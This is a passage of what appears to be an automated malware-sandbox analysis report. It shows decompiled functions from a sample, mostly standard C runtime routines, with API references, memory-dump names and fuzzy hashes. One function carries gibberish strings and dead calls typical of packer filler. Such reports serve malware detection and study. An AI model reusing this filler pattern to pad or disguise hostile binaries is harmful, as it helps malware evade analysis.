0x00405d13
0x00405d18
0x00405d20
0x00405d25
0x00405d26
0x00405d27
0x00405d28
0x00405d29
0x00405d2a
0x00405d2b
0x00405d2c
0x00405d2d
0x00405d2e
0x00405d2f
0x00405d30
0x00405d32
0x00405d3d
0x00405d3e
0x00405d45
0x00405d47
0x00405d4f
0x00405d55
0x00405d5a
0x00405d5c
0x00405d69
0x00405d6b
0x00405d6e
0x00405d70
0x00405da4
0x00405da4
0x00405d72
0x00405d72
0x00405d78
0x00405d85
0x00405d87
0x00405d8c
0x00405d8f
0x00405d92
0x00405d94
0x00405d94
0x00405d95
0x00405d95
0x00405d9c
0x00405da1
0x00405da6
0x00405dac
0x00405db2
0x00405db8
0x00405dbb
0x00405dbe
0x00405dc4
0x00405dca
0x00405dcd
0x00405dd6
0x00405ddf
0x00405de8
0x00405df1
0x00405dfa
0x00405e08
0x00405e12
0x00405e12
0x00405cdb
0x00405cdb
0x00405cdd
0x00405cdd
0x00405ce9
0x00405ce9

APIs

std::exception::exception.LIBCMT ref: 00405D09
__CxxThrowException@8.LIBCMT ref: 00405D20
std::_Mutex::_Mutex.LIBCPMT ref: 00405D55
std::locale::_Init.LIBCPMT ref: 00405D73
std::_Lockit::_Lockit.LIBCPMT ref: 00405D87

Part of subcall function 00407CBD: _malloc.LIBCMT ref: 00407CD7

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: std::_$Exception@8InitLockitLockit::_MutexMutex::_Throw_mallocstd::exception::exceptionstd::locale::_
String ID:
API String ID: 3651436251-0
Opcode ID: 29662ba3776a4b6ed28dd05350d995256c7607a7fbe6b92661710e6e1812b51e
Instruction ID: 08794fb7d8cce555599cf4257f00a759054e67bf99baa22b66145405548e5ac7
Opcode Fuzzy Hash: 29662ba3776a4b6ed28dd05350d995256c7607a7fbe6b92661710e6e1812b51e
Instruction Fuzzy Hash: 8E3148B5904B009BD324DF24C591B97B7E0FF44710F108A2EE89797B81EB78A508CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0042202C Relevance: 7.6, APIs: 5, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0042202C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t27;
				signed int _t34;
				signed int _t36;
				signed char _t42;
				intOrPtr* _t46;
				void* _t49;
				signed int _t56;
				void* _t57;

				_t55 = __esi;
				_t49 = __edx;
				_push(0xc);
				_push(0x4b6780);
				E0040E1B4(__ebx, __edi, __esi);
				 *(_t57 - 0x1c) = 0;
				_t42 = 0;
				if(( *(_t57 + 0xc) & 0x00000008) != 0) {
					_t42 = 0x20;
				}
				if(( *(_t57 + 0xc) & 0x00004000) != 0) {
					_t42 = _t42 | 0x00000080;
				}
				if(( *(_t57 + 0xc) & 0x00000080) != 0) {
					_t42 = _t42 | 0x00000010;
				}
				_t27 = GetFileType( *(_t57 + 8));
				if(_t27 != 0) {
					__eflags = _t27 - 2;
					if(__eflags != 0) {
						__eflags = _t27 - 3;
						if(__eflags == 0) {
							_t42 = _t42 | 0x00000008;
							__eflags = _t42;
						}
					} else {
						_t42 = _t42 | 0x00000040;
					}
					_t56 = E00421E92(_t42, _t49, 0, _t55, __eflags);
					 *(_t57 + 0xc) = _t56;
					__eflags = _t56 - 0xffffffff;
					if(_t56 != 0xffffffff) {
						 *((intOrPtr*)(_t57 - 4)) = 0;
						E00421C4D(_t56,  *(_t57 + 8));
						_t46 = 0x542c20 + (_t56 >> 5) * 4;
						_t34 = (_t56 & 0x0000001f) << 6;
						 *( *_t46 + _t34 + 4) = _t42 | 0x00000001;
						 *( *_t46 + _t34 + 0x24) =  *( *_t46 + _t34 + 0x24) & 0x00000080;
						 *( *_t46 + _t34 + 0x24) =  *( *_t46 + _t34 + 0x24) & 0x0000007f;
						 *(_t57 - 0x1c) = 1;
						 *((intOrPtr*)(_t57 - 4)) = 0xfffffffe;
						_t36 = E0042211A(0, _t56);
						__eflags =  *(_t57 - 0x1c);
						if( *(_t57 - 0x1c) == 0) {
							goto L8;
						}
						_t37 = _t56;
						goto L9;
					} else {
						 *((intOrPtr*)(E0040BCDC())) = 0x18;
						_t36 = E0040BCEF();
						 *_t36 = 0;
						goto L8;
					}
				} else {
					_t36 = E0040BD02(GetLastError());
					L8:
					_t37 = _t36 | 0xffffffff;
					L9:
					return E0040E1F9(_t37);
				}
			}

0x0042202c
0x0042202c
0x0042202c
0x0042202e
0x00422033
0x0042203a
0x0042203d
0x00422043
0x00422045
0x00422045
0x0042204f
0x00422051
0x00422051
0x00422058
0x0042205a
0x0042205a
0x00422060
0x00422068
0x00422080
0x00422083
0x0042208a
0x0042208d
0x0042208f
0x0042208f
0x0042208f
0x00422085
0x00422085
0x00422085
0x00422097
0x00422099
0x0042209c
0x0042209f
0x004220b5
0x004220bc
0x004220cb
0x004220d7
0x004220dc
0x004220e6
0x004220ef
0x004220f2
0x004220f9
0x00422100
0x00422105
0x00422108
0x00000000
0x00000000
0x0042210e
0x00000000
0x004220a1
0x004220a6
0x004220ac
0x004220b1
0x00000000
0x004220b1
0x0042206a
0x00422071
0x00422077
0x00422077
0x0042207a
0x0042207f
0x0042207f

APIs

GetFileType.KERNEL32(?,?,?,004B6780,0000000C), ref: 00422060
GetLastError.KERNEL32(?,?,004B6780,0000000C), ref: 0042206A
__dosmaperr.LIBCMT ref: 00422071
__alloc_osfhnd.LIBCMT ref: 00422092
__set_osfhnd.LIBCMT ref: 004220BC

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
String ID:
API String ID: 43408053-0
Opcode ID: 781fbd99e582adcd61ccf6cdb148d827b35ac141e256fa08f09dbaeea71f7180
Instruction ID: 8df27fa11894cfaae8500bc2a4675e99a187a5239a5d07e809c5776c069ae731
Opcode Fuzzy Hash: 781fbd99e582adcd61ccf6cdb148d827b35ac141e256fa08f09dbaeea71f7180
Instruction Fuzzy Hash: 38217B30601265AACB119F35EA017D97B10AF02328F98C24BE6644F2E3C7BC8541DF4D

Uniqueness

Uniqueness Score: -1.00%

Function 00409E9C Relevance: 7.6, APIs: 5, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00409E9C(void* __ebx, void* __edi, void* __esi, void* __eflags, LONG** _a4) {
				signed int _v8;
				void* _t10;
				LONG* _t13;
				LONG* _t18;
				LONG* _t22;
				LONG** _t33;

				_t31 = __edi;
				_t24 = __ebx;
				_push(8);
				_push(0x4b61f8);
				_t10 = E0040E1B4(__ebx, __edi, __esi);
				_t33 = _a4;
				if(_t33 != 0) {
					E00410EE5(__ebx, __edi, 0xd);
					_v8 = _v8 & 0x00000000;
					_t13 = _t33[1];
					if(_t13 != 0 && InterlockedDecrement(_t13) == 0) {
						_t22 = _t33[1];
						_t42 = _t22 - 0x4b8a48;
						if(_t22 != 0x4b8a48) {
							_push(_t22);
							E00409330(_t24, _t31, _t33, _t42);
						}
					}
					_v8 = 0xfffffffe;
					E00409E87();
					if( *_t33 != 0) {
						E00410EE5(_t24, _t31, 0xc);
						_v8 = 1;
						E00409BAA( *_t33);
						_t18 =  *_t33;
						if(_t18 != 0 &&  *_t18 == 0) {
							_t46 = _t18 - 0x4b8858;
							if(_t18 != 0x4b8858) {
								E004099D2(_t18);
							}
						}
						_v8 = 0xfffffffe;
						E00409E93();
					}
					 *_t33 = 0xbaadf00d;
					_t33[1] = 0xbaadf00d;
					_push(_t33);
					_t10 = E00409330(_t24, _t31, _t33, _t46);
				}
				return E0040E1F9(_t10);
			}

0x00409e9c
0x00409e9c
0x00409dda
0x00409ddc
0x00409de1
0x00409de6
0x00409deb
0x00409df3
0x00409df9
0x00409dfd
0x00409e02
0x00409e0f
0x00409e12
0x00409e17
0x00409e19
0x00409e1a
0x00409e1f
0x00409e17
0x00409e20
0x00409e27
0x00409e2f
0x00409e33
0x00409e39
0x00409e42
0x00409e48
0x00409e4c
0x00409e53
0x00409e58
0x00409e5b
0x00409e60
0x00409e58
0x00409e61
0x00409e68
0x00409e68
0x00409e72
0x00409e74
0x00409e77
0x00409e78
0x00409e7d
0x00409e83

APIs

__lock.LIBCMT ref: 00409DF3

Part of subcall function 00410EE5: __mtinitlocknum.LIBCMT ref: 00410EFB
Part of subcall function 00410EE5: __amsg_exit.LIBCMT ref: 00410F07
Part of subcall function 00410EE5: EnterCriticalSection.KERNEL32(?,?,?,0040D4E7,00000004,004B62A0,0000000C,0040DC88,?,?,00000000,00000000,00000000,?,0040D854,00000001), ref: 00410F0F

InterlockedDecrement.KERNEL32(00000000), ref: 00409E05

Part of subcall function 00409330: __lock.LIBCMT ref: 0040934E
Part of subcall function 00409330: ___sbh_find_block.LIBCMT ref: 00409359
Part of subcall function 00409330: ___sbh_free_block.LIBCMT ref: 00409368
Part of subcall function 00409330: HeapFree.KERNEL32(00000000,?,004B61B8,0000000C,00410EC6,00000000,004B64D0,0000000C,00410F00,?,?,?,0040D4E7,00000004,004B62A0,0000000C), ref: 00409398
Part of subcall function 00409330: GetLastError.KERNEL32(?,0040D4E7,00000004,004B62A0,0000000C,0040DC88,?,?,00000000,00000000,00000000,?,0040D854,00000001,00000214), ref: 004093A9

__lock.LIBCMT ref: 00409E33
___removelocaleref.LIBCMT ref: 00409E42
___freetlocinfo.LIBCMT ref: 00409E5B

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: __lock$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref___sbh_find_block___sbh_free_block__amsg_exit__mtinitlocknum
String ID:
API String ID: 1907232653-0
Opcode ID: 8f4dbc24e57682258d0bc879d338122fad0433a9dfc4ab9795811c026c51e602
Instruction ID: 053ad0679e1a7f1c346a0876f87a8719e9ed4f63cb2dac67f6555e5c90db7fb1
Opcode Fuzzy Hash: 8f4dbc24e57682258d0bc879d338122fad0433a9dfc4ab9795811c026c51e602
Instruction Fuzzy Hash: 2E114C3160530496DB24EBBAD805B9F73A8AF40764F24483FF454BA2D2DB7D9C80C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 004143CB Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E004143CB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x4b64f0);
				E0040E1B4(__ebx, __edi, __esi);
				_t31 = E0040D8A2(__ebx, __edx, _t35);
				_t15 =  *0x4b8a34; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00410EE5(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x4b8e70; // 0x24e1608
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x4b8a48;
								if(__eflags != 0) {
									_push(_t33);
									E00409330(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x4b8e70; // 0x24e1608
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x4b8e70; // 0x24e1608
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00414466();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040DE31(_t29, 0x20);
				}
				return E0040E1F9(_t33);
			}

0x004143cb
0x004143cb
0x004143cb
0x004143cb
0x004143cd
0x004143d2
0x004143dc
0x004143de
0x004143e6
0x00414407
0x0041440d
0x00414411
0x00414414
0x00414417
0x0041441d
0x0041441f
0x00414421
0x00414424
0x0041442a
0x0041442c
0x0041442e
0x00414434
0x00414436
0x00414437
0x0041443c
0x00414434
0x0041442c
0x0041443d
0x00414442
0x00414445
0x0041444b
0x0041444f
0x0041444f
0x00414455
0x0041445c
0x004143ee
0x004143ee
0x004143ee
0x004143f3
0x004143f7
0x004143fc
0x00414404

APIs

__getptd.LIBCMT ref: 004143D7

Part of subcall function 0040D8A2: __getptd_noexit.LIBCMT ref: 0040D8A5
Part of subcall function 0040D8A2: __amsg_exit.LIBCMT ref: 0040D8B2

__amsg_exit.LIBCMT ref: 004143F7
__lock.LIBCMT ref: 00414407
InterlockedDecrement.KERNEL32(?), ref: 00414424
InterlockedIncrement.KERNEL32(024E1608), ref: 0041444F

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: dd66d0c3b67db3d718c8c8da078137b433ca7558a94e9d2d4e0d75ef809820b6
Instruction ID: 176d69379bec736acec882f6ee036d1be1f118f7976a17211c64c01c5b0b745a
Opcode Fuzzy Hash: dd66d0c3b67db3d718c8c8da078137b433ca7558a94e9d2d4e0d75ef809820b6
Instruction Fuzzy Hash: 0D01A131E016219BCB21AB6695057DE7360BB84B14F05412FE850A7691CB3CA882CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 00409330 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 39%

			E00409330(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x4b61b8);
				_t8 = E0040E1B4(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E0040E1F9(_t8);
				}
				if( *0x542c04 != 3) {
					_push(_t23);
					L7:
					if(HeapFree( *0x4b9f04, 0, ??) == 0) {
						_t10 = E0040BCDC();
						 *_t10 = E0040BC9A(GetLastError());
					}
					goto L9;
				}
				E00410EE5(__ebx, __edi, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E00411013(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E00411043();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E00409386();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x00409330
0x00409332
0x00409337
0x0040933c
0x00409341
0x004093b8
0x004093bd
0x004093bd
0x0040934a
0x0040938f
0x00409390
0x004093a0
0x004093a2
0x004093b5
0x004093b7
0x00000000
0x004093a0
0x0040934e
0x00409354
0x00409359
0x0040935f
0x00409364
0x00409366
0x00409367
0x00409368
0x0040936e
0x0040936f
0x00409376
0x0040937f
0x00000000
0x00409381
0x00409381
0x00000000
0x00409381

APIs

__lock.LIBCMT ref: 0040934E

Part of subcall function 00410EE5: __mtinitlocknum.LIBCMT ref: 00410EFB
Part of subcall function 00410EE5: __amsg_exit.LIBCMT ref: 00410F07
Part of subcall function 00410EE5: EnterCriticalSection.KERNEL32(?,?,?,0040D4E7,00000004,004B62A0,0000000C,0040DC88,?,?,00000000,00000000,00000000,?,0040D854,00000001), ref: 00410F0F

___sbh_find_block.LIBCMT ref: 00409359
___sbh_free_block.LIBCMT ref: 00409368
HeapFree.KERNEL32(00000000,?,004B61B8,0000000C,00410EC6,00000000,004B64D0,0000000C,00410F00,?,?,?,0040D4E7,00000004,004B62A0,0000000C), ref: 00409398
GetLastError.KERNEL32(?,0040D4E7,00000004,004B62A0,0000000C,0040DC88,?,?,00000000,00000000,00000000,?,0040D854,00000001,00000214), ref: 004093A9

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: ecee6a963b8a0fe8566de3161c859b755afb0ff15c7ffbc7f03efc331b7c1832
Instruction ID: 1fd8f28b2bd2f2d329a3897ae811fae454cf16acd0c9df7fe2f6021ad96cd4cd
Opcode Fuzzy Hash: ecee6a963b8a0fe8566de3161c859b755afb0ff15c7ffbc7f03efc331b7c1832
Instruction Fuzzy Hash: 8C014F31905315EADB246BB29C0679F3B689F08768F14452FFA04BA1D2DB3C8D819E9D

Uniqueness

Uniqueness Score: -1.00%

Function 00407CBD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00407CBD(char _a4) {
				intOrPtr _v0;
				char _v16;
				void* _t8;
				signed int _t9;
				void* _t13;
				void* _t17;
				void* _t25;
				void* _t26;

				while(1) {
					_t2 =  &_a4; // 0x405067
					_t8 = E0040D39C(_t17, _t25, _t26,  *_t2);
					if(_t8 != 0) {
						break;
					}
					_t9 = E0040F923(_a4);
					__eflags = _t9;
					if(_t9 == 0) {
						__eflags =  *0x4b9a68 & 0x00000001;
						if(( *0x4b9a68 & 0x00000001) == 0) {
							 *0x4b9a68 =  *0x4b9a68 | 0x00000001;
							__eflags =  *0x4b9a68;
							E00407CA2(0x4b9a5c);
							E0040790D( *0x4b9a68, 0x4b5c51);
						}
						E00406140( &_v16, 0x4b9a5c);
						E00409956( &_v16, 0x4b6900);
						asm("int3");
						__eflags =  *0x4b9a74 - 1;
						if( *0x4b9a74 == 1) {
							E0040FB6C(_t25);
						}
						_t13 = E0040F99B(_t25, _v0);
						E0040DE85(0xff);
						return _t13;
					} else {
						continue;
					}
					L10:
				}
				return _t8;
				goto L10;
			}

0x00407cd4
0x00407cd4
0x00407cd7
0x00407cdf
0x00000000
0x00000000
0x00407cca
0x00407cd0
0x00407cd2
0x00407ce3
0x00407cef
0x00407cf1
0x00407cf1
0x00407cfa
0x00407d04
0x00407d09
0x00407d0e
0x00407d1c
0x00407d21
0x00407d27
0x00407d2e
0x00407d30
0x00407d30
0x00407d38
0x00407d42
0x00407d4a
0x00000000
0x00000000
0x00000000
0x00000000
0x00407cd2
0x00407ce2
0x00000000

APIs

_malloc.LIBCMT ref: 00407CD7

Part of subcall function 0040D39C: __FF_MSGBANNER.LIBCMT ref: 0040D3BF
Part of subcall function 0040D39C: __NMSG_WRITE.LIBCMT ref: 0040D3C6
Part of subcall function 0040D39C: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,0040DC3E,?,00000001,?,?,00410E6F,00000018,004B64D0,0000000C,00410F00), ref: 0040D413

std::bad_alloc::bad_alloc.LIBCMT ref: 00407CFA

Part of subcall function 00407CA2: std::exception::exception.LIBCMT ref: 00407CAE

__CxxThrowException@8.LIBCMT ref: 00407D1C

Strings

gP@, xrefs: 00407CD4

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
String ID: gP@
API String ID: 3715980512-2126387315
Opcode ID: b7de9b7af2c59bcaff5d03385248139d70b6920292394bf630dffbdd0d48f8b5
Instruction ID: f5d57a6c59dc72bda56a7dc58823f7cd702d25c108be1cdb9991987b7c26e336
Opcode Fuzzy Hash: b7de9b7af2c59bcaff5d03385248139d70b6920292394bf630dffbdd0d48f8b5
Instruction Fuzzy Hash: 32F0BE3190824926EA0477A2E806A9A3B688B4435CB20403FBD01765D2DE3CAE44C29E

Uniqueness

Uniqueness Score: -1.00%

Function 004049D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004049D0(signed int* _a4, signed int _a8, signed int _a12) {
				char _v1024;
				signed int _t6;
				signed int* _t10;

				if( *0x53c47c == 3) {
					__imp__GetVolumeNameForVolumeMountPointA("luziwecusecibenedudizini rimaxapolavotekegeyoritatulupe",  &_v1024, 0);
					FatalAppExitW(0, L"Jol polafajovojafu yikivisisazutumivatah");
				}
				 *_t10 = 0;
				 *_t10 = _a12;
				_t6 = _a8;
				 *_t10 =  *_t10 ^ _t6;
				 *_a4 =  *_t10;
				return _t6;
			}

0x004049dd
0x004049eb
0x004049f8
0x004049f8
0x004049fe
0x00404a0c
0x00404a0f
0x00404a16
0x00404a23
0x00404a2b

APIs

GetVolumeNameForVolumeMountPointA.KERNEL32 ref: 004049EB
FatalAppExitW.KERNEL32(00000000,Jol polafajovojafu yikivisisazutumivatah), ref: 004049F8

Strings

Jol polafajovojafu yikivisisazutumivatah, xrefs: 004049F1
luziwecusecibenedudizini rimaxapolavotekegeyoritatulupe, xrefs: 004049E6

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: Volume$ExitFatalMountNamePoint
String ID: Jol polafajovojafu yikivisisazutumivatah$luziwecusecibenedudizini rimaxapolavotekegeyoritatulupe
API String ID: 1310355520-1042810502
Opcode ID: a7cc20aacb1718092f36f628d6eda2d6d5ec934027e3db8465187e897d4325f2
Instruction ID: 5dcb0999a05db23f9a38f803834e1a2be7430c7880058f6c63f848e32972b70f
Opcode Fuzzy Hash: a7cc20aacb1718092f36f628d6eda2d6d5ec934027e3db8465187e897d4325f2
Instruction Fuzzy Hash: 7BF030B4244300DFD324DF24C941B6ABBE4AB98301F00442DE7D4A73A0C7784485CF1A

Uniqueness

Uniqueness Score: -1.00%

Function 004222EC Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004222EC(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0040ADD3( &_v20, _a16);
						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
							if(E00418F11( *_t72 & 0x000000ff,  &_v20) == 0) {
								if(MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
									L10:
									if(_v8 != 0) {
										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									}
									return 1;
								}
								L21:
								_t54 = E0040BCDC();
								 *_t54 = 0x2a;
								if(_v8 != 0) {
									_t54 = _v12;
									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							if(_t65 <= 1 || _a12 < _t65) {
								L17:
								if(_a12 <  *(_t56 + 0xac) || _t72[1] == 0) {
									goto L21;
								} else {
									goto L19;
								}
							} else {
								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
								_t56 = _v20;
								if(_t58 != 0) {
									L19:
									_t57 =  *(_t56 + 0xac);
									if(_v8 == 0) {
										return _t57;
									}
									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									return _t57;
								}
								goto L17;
							}
						}
						_t59 = _a4;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x004222f6
0x004222fd
0x00422314
0x00000000
0x00422304
0x00422306
0x00422320
0x0042232b
0x0042235d
0x004223fb
0x0042233b
0x0042233e
0x00422343
0x00422343
0x00000000
0x00422349
0x004223bd
0x004223bd
0x004223c2
0x004223cb
0x004223cd
0x004223d0
0x004223d0
0x00000000
0x004223d4
0x0042235f
0x00422362
0x0042236b
0x00422392
0x0042239b
0x00000000
0x00000000
0x00000000
0x00000000
0x00422372
0x00422385
0x0042238d
0x00422390
0x004223a2
0x004223a2
0x004223ab
0x00422319
0x00422319
0x004223b4
0x00000000
0x004223b4
0x00000000
0x00422390
0x0042236b
0x0042232d
0x00422332
0x00422338
0x00422338
0x00000000
0x00422308
0x00422308
0x0042230d
0x00422311
0x00422311
0x00000000
0x0042230d
0x00422306

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00422320
__isleadbyte_l.LIBCMT ref: 00422354
MultiByteToWideChar.KERNEL32(00000080,00000009,00000000,?,00000000,00000000,?,?,?,?,00000000,00000000,?), ref: 00422385
MultiByteToWideChar.KERNEL32(00000080,00000009,00000000,00000001,00000000,00000000,?,?,?,?,00000000,00000000,?), ref: 004223F3

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 68c82d32ed40fcd4676703eb1a9c8951a0c3cf18703acd0b6971c0fd66563e10
Instruction ID: 4c46e595ad7425ac14c4594e3501de589da43a2bfde86f6b345472554bf3abfa
Opcode Fuzzy Hash: 68c82d32ed40fcd4676703eb1a9c8951a0c3cf18703acd0b6971c0fd66563e10
Instruction Fuzzy Hash: 5431E030B00269FFDB10DFB4D980AAE3BA1FF01320B5485AAF8509B291D7B8CD41DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040D322 Relevance: 6.0, APIs: 4, Instructions: 46
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040D322(void* __ebx, void* __edx, void* __edi, long _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t3;
				void* _t4;
				long _t5;
				void* _t9;
				void* _t14;
				long _t16;
				long _t18;

				_t14 = __edi;
				_t9 = __ebx;
				if( *0x4b9f04 == 0) {
					E0040FB6C(__edx);
					E0040F99B(__edx, 0x1e);
					E0040DE85(0xff);
				}
				_t3 =  *0x542c04;
